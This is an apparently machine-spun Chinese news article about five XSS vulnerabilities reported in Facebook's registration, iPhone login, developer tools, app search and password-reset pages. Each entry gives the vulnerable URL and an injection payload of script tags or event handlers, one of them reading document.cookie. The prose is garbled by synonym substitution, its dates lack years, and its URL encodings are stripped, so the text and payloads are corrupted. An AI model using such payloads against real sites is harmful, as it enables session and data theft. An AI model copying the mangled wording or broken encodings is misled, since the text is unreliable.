近期，Facebook惊现高危XSS平安破绽，致使其用户遭受伟大威胁。本文将对这些破绽公布举行详细先容。Facebook在年12月15日与年1月4日被曝出一系列高危XSS平安破绽，Facebook众多的功效同时遭受牵连，如新用户注册、iPhone登录、密码重新设定，等等。 攻击者能够行使这些XSS破绽攻击数以百万计的Facebook用户，例如散播恶意软件、广告软件和特工软件等等。拜这些高危跨站点剧本攻击破绽所赐，Facebook用户可能受到钓鱼攻击并导致ID失贼。停止本月5号为止，这些破绽尚未获得修复，这些高危破绽已经对用户的隐私构成了高度的威胁。 平安研究职员最近发现的有XSS破绽的页面包罗，开发职员页面、新用户注册页面、iphone登录页面以及应用程序页面。攻击者能够行使这些XSS破绽攻击数以百万计的Facebook用户，例如散播恶意软件、广告软件和特工软件等等。对于用户来说，为了远离这些威胁的攻击最好不要接受不认识的职员加为密友的请求，万万不要点击不明泉源的链接。 原因是Facebook的小我私家概况中包含了许多小我私家信息，“密友”通过则这些信息足以发动有针对性的钓鱼攻击，或者向您发送有针对性的垃圾邮件。然则如果您点击了一个共享链接效果会怎样呢？很明显，对他们来说，您就不会有什么隐私了！！！为了平安和隐私起见，一定要注意您在社交网络上的小我私家简介。 下面我们对这些最新破绽剖析举行先容： 1号XSS破绽： 所在位置：http://www.new.facebook.com/r.php问题页面的镜像：http://www.xssed.com/mirror//攻击性POST：reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar 2号XSS破绽 所在位置：https://login.facebook.com/login.php?iphoneamp;next=http3A2F2Fiphone.facebook.com2F问题页面的镜像：http://www.xssed.com/mirror//攻击性POST：email=bizE3Cscript3EalerttohellwithgeorgiaC2Fscript3E3C22amp;pass=greetz2evilghostamp;next=http3A2F2Fiphone.facebook.com2Famp;login=Login 3号XSS破绽 所在位置及攻击字符串：http://apps.facebook.com/blognetworks/searchpage.php?tag=E3Cscript3Ealert(22DaiMon22)3C/script3E问题页面的镜像：http://www.xssed.com/mirror// 4号XSS破绽： 所在位置：http://developers.facebook.com/tools.php?fbml问题页面的镜像：http://www.xssed.com/mirror//攻击性POST：profile=amp;position=wideamp;api_key=E3C2Ftitle3E3Cscript3EalertC2Fscript3E3E3Cmarquee3E3Ch13EXSS+by+p3lo3C2Fh13E3C2Fmarquee3E+amp;fbml=Hey you all! Our best wishes for !!! :) ;) 5号XSS破绽： 这是Facebook的Reset Password页面近期再次出现危险的跨站点剧本攻击平安破绽。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感小我私家信息。希望这个破绽能够获得迅速修复，幸亏以前他们的反映照样很迅速的。 所在位置：http://www.facebook.com/reset.php?locale=en_GBE3Cscript3Ealert(1)3C/script3EE3Cscript3Ealert(document.cookie)3C/script3E 问题页面的镜像